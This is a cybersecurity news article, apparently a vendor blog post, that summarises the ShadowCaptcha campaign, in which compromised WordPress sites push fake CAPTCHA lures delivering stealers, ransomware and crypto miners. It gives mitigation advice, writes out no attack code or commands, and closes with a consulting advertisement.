WordPress Sites Under Siege: ShadowCaptcha Campaign Unleashes Malware

A sophisticated cybercrime operation, dubbed ShadowCaptcha, is actively exploiting over 100 compromised WordPress websites to distribute a range of malicious payloads, including ransomware, information stealers, and cryptocurrency miners. The campaign, detected in August 2025, leverages social engineering tactics and living-off-the-land binaries to compromise targeted systems.

Key Takeaways

• ShadowCaptcha redirects users to fake CAPTCHA pages to deliver malware.

• The campaign utilizes social engineering, LOLBins, and multi-stage payloads.

• Malware includes information stealers (Lumma, Rhadamanthys), ransomware (Epsilon Red), and crypto miners (XMRig).

• Compromised sites are primarily located in Australia, Brazil, Italy, Canada, Colombia, and Israel.

• Attackers likely exploit vulnerable WordPress plugins or use compromised credentials.

The ShadowCaptcha Attack Chain

The campaign begins when unsuspecting visitors land on a WordPress site injected with malicious JavaScript. This script initiates a redirection chain leading to fake Cloudflare or Google CAPTCHA pages. From there, the attack bifurcates based on "ClickFix" instructions, either using the Windows Run dialog or prompting users to save and execute an HTML Application (HTA) file.

The Windows Run dialog execution path deploys Lumma and Rhadamanthys information stealers via MSI installers or remotely hosted HTA files. Executing a saved HTA payload results in the installation of Epsilon Red ransomware. The ClickFix lure, which copies malicious commands to the user's clipboard for unwitting execution, was previously documented by CloudSEK.

Advanced Evasion and Payload Delivery

ShadowCaptcha employs anti-debugger techniques to thwart analysis and uses DLL side-loading to disguise malicious code execution as legitimate processes. Some campaigns have been observed delivering XMRig-based cryptocurrency miners, with configurations fetched from Pastebin for dynamic adjustments. In these instances, attackers have also deployed a vulnerable driver, "WinRing0x64.sys," to gain kernel-level access and enhance mining efficiency.

Geographic Reach and Compromise Methods

The majority of compromised WordPress sites are situated in Australia, Brazil, Italy, Canada, Colombia, and Israel, affecting sectors such as technology, hospitality, legal/finance, healthcare, and real estate. While the exact method of WordPress site compromise remains unclear, researchers suggest attackers gain access through exploits in various plugins or by using compromised WordPress portal credentials.

Mitigation and Broader Threat Landscape

To counter ShadowCaptcha, users are advised to be vigilant against ClickFix campaigns, implement network segmentation to prevent lateral movement, and ensure WordPress sites are regularly updated and secured with multi-factor authentication. The operation highlights the evolution of social engineering into comprehensive cyber operations, enabling stealthy persistence and pivoting between data theft, crypto mining, and ransomware.

This disclosure coincides with GoDaddy's analysis of Help TDS, a traffic distribution system active since 2017, linked to schemes like VexTrio Viper. Help TDS provides malicious PHP code templates injected into WordPress sites, directing users to malicious destinations. They have also developed a malicious WordPress plugin, "woocommerce_inputs," estimated to be on over 10,000 sites, which masquerades as a legitimate WooCommerce plugin to evade detection and facilitate traffic monetization and credential harvesting.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

• ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners, The Hacker News.